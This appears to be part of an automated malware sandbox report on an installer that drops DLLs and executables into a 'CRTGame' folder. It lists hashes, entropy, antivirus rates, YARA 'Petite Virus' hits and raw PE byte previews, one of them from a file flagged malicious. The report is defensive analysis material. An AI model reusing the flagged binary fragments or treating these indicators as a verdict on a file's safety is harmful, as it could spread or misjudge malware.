                                                                                  SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                  MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                  SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                  SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                  SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):227328
                                                                                  Entropy (8bit):6.641153481093122
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                  MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                  SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                  SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                  SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):123406
                                                                                  Entropy (8bit):6.263889638223575
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                  MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                  SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                  SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                  SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11532
                                                                                  Entropy (8bit):7.219753259626605
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                  MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                  SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                  SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                  SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19008
                                                                                  Entropy (8bit):7.672481244971812
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                  MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                  SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                  SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                  SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):258560
                                                                                  Entropy (8bit):6.491223412910377
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                  MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                  SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                  SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                  SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):867854
                                                                                  Entropy (8bit):4.9264497464202694
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                  MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                  SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                  SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                  SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294926
                                                                                  Entropy (8bit):6.191604766067493
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                  MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                  SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                  SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                  SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35588
                                                                                  Entropy (8bit):7.817557274117395
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                  MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                  SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                  SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                  SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):26126
                                                                                  Entropy (8bit):6.048294343792499
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                  MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                  SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                  SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                  SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):266254
                                                                                  Entropy (8bit):6.343813822604148
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                                  MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                                  SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                                  SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                                  SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):845312
                                                                                  Entropy (8bit):6.581151900686739
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                  MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                  SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                  SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                  SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):16910
                                                                                  Entropy (8bit):5.289608933932413
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                  MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                  SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                  SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                  SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):5960
                                                                                  Entropy (8bit):5.956401374574174
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                  MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                  SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                  SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                  SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22542
                                                                                  Entropy (8bit):5.5875455203930615
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                  MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                  SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                  SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                  SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):18966
                                                                                  Entropy (8bit):7.620111275837424
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                  MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                  SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                  SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                  SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, Author: Joe Security
                                                                                  Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):512014
                                                                                  Entropy (8bit):6.566561154468342
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                  MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                  SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                  SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                  SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.423554884287906
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                  MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                  SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                  SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                  SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):13838
                                                                                  Entropy (8bit):5.173769974589746
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                  MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                  SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                  SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                  SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39304
                                                                                  Entropy (8bit):7.819409739152795
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                  MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                  SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                  SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                  SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36752
                                                                                  Entropy (8bit):7.780431937344781
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                  MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                  SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                  SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                  SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.192037544202194
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                  MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                  SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                  SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                  SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):112640
                                                                                  Entropy (8bit):6.540227486061059
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                  MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                  SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                  SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                  SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):127669
                                                                                  Entropy (8bit):7.952352167575405
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                  MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                  SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                  SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                  SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, Author: Joe Security
